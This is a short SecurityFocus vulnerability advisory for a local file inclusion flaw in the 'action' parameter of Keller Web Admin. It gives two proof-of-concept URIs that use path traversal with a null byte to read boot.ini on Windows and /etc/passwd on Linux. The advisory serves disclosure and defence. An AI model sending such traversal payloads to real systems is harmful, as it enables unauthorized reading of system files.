Keller Web Admin 'action' Parameter Local File Include Vulnerability

The following proof-of-concept URIs are available:

Windows - http://www.example.com/Public/index.php?action=../../../../../../../../boot.ini%00

Linux - http://www.example.com/Public/index.php?action=../../../../../../../etc/passwd%00


 

Privacy Statement
Copyright 2010, SecurityFocus